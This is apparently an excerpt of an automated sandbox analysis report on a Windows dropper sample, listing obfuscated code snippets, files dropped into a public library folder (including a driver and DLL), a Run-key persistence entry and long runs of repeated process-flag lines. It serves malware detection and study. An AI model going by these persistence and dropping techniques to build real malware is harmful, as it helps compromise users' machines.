Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029E6760 push ecx; mov dword ptr [esp], edx	0_2_029E6765
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029E4434 push 029E44AAh; ret	0_2_029E44A2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029E4432 push 029E44AAh; ret	0_2_029E44A2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029E6ADC push ecx; mov dword ptr [esp], edx	0_2_029E6AE1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029EEB14 push 029EEBBFh; ret	0_2_029EEBB7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029EEB12 push 029EEBBFh; ret	0_2_029EEBB7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029E6B20 push ecx; mov dword ptr [esp], edx	0_2_029E6B25
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A04980 push 02A049EBh; ret	0_2_02A049E3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029E69BC push ecx; mov dword ptr [esp], edx	0_2_029E69C1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029DE90C push 029DE938h; ret	0_2_029DE930
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029FCFA4 push 029FCFD0h; ret	0_2_029FCFC8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029FCC74 push 029FCCB7h; ret	0_2_029FCCAF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029FAC64 push 029FACA2h; ret	0_2_029FAC9A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029E4DDC push 029E4E29h; ret	0_2_029E4E21
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029FB3E8 push 029FB414h; ret	0_2_029FB40C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A390AC push 02A39125h; ret	0_2_02A3911D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029FD01C push 029FD054h; ret	0_2_029FD04C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A391F8 push 02A39288h; ret	0_2_02A39280
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A39144 push 02A391ECh; ret	0_2_02A391E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A0B654 push ecx; mov dword ptr [esp], ecx	0_2_02A0B658
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029DD798 push ecx; mov dword ptr [esp], edx	0_2_029DD79D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A25710 push 02A2576Ah; ret	0_2_02A25762

Source: 5.2.srcngmlC.pif.32f55b90.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'cEQj8dc1VA9oN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'cEQj8dc1VA9oN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 5.2.srcngmlC.pif.344a0ee8.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'cEQj8dc1VA9oN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 5.2.srcngmlC.pif.31c60fae.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'cEQj8dc1VA9oN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	File created: C:\Users\Public\Libraries\Clmgncrs.PIF			Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	File created: C:\Users\Public\Libraries\srcngmlC.pif			Jump to dropped file

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

File created: C:\Users\Public\Libraries\truesight.sys

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	File created: C:\Users\Public\Libraries\Clmgncrs.PIF	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	File created: C:\Users\Public\Libraries\truesight.sys	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	File created: C:\Users\Public\Libraries\easinvoker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	File created: C:\Users\Public\Libraries\netutils.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	File created: C:\Users\Public\Libraries\srcngmlC.pif	Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Clmgncrs			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Clmgncrs			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A1224C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	0_2_02A1224C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029FAEA0 IsIconic,GetWindowPlacement,GetWindowRect,	0_2_029FAEA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A11018 IsIconic,GetCapture,	0_2_02A11018
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A2319C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	0_2_02A2319C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A238CC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,	0_2_02A238CC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A23990 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,	0_2_02A23990
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A11920 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	0_2_02A11920
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A1FCD8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,	0_2_02A1FCD8
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: 6_2_029C224C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	6_2_029C224C
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: 6_2_029C1018 IsIconic,GetCapture,	6_2_029C1018
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: 6_2_029D319C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	6_2_029D319C
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: 6_2_029D38CC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	6_2_029D38CC
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: 6_2_029D3990 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	6_2_029D3990
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: 6_2_029C1920 IsIconic,SetWindowPos,GetWindowPlacement,	6_2_029C1920
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: 6_2_029CFCD8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,	6_2_029CFCD8

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Code function: 0_2_02A28820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_02A28820

Source: C:\Users\Public\Libraries\srcngmlC.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\srcngmlC.pif	Process information set: NOOPENFILEERRORBOX
